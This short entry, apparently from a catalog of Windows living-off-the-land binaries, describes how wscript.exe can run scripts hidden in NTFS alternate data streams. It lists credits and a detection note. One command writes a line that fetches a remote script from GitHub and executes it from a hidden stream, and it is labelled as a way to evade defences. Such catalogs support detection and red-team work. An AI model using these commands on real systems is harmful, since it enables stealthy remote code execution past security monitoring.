Used by Windows to execute scripts
Paths:
Acknowledgement:
Oddvar Moe - @oddvarmoe
SaiLay(valen) - @404death
Detection:
Wscript.exe executing code from alternate data streams
wscript c:\ads\file.txt:script.vbs
Usecase:Execute hidden code to evade defensive counter measures
echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js
Usecase:Execute hidden code to evade defensive counter measures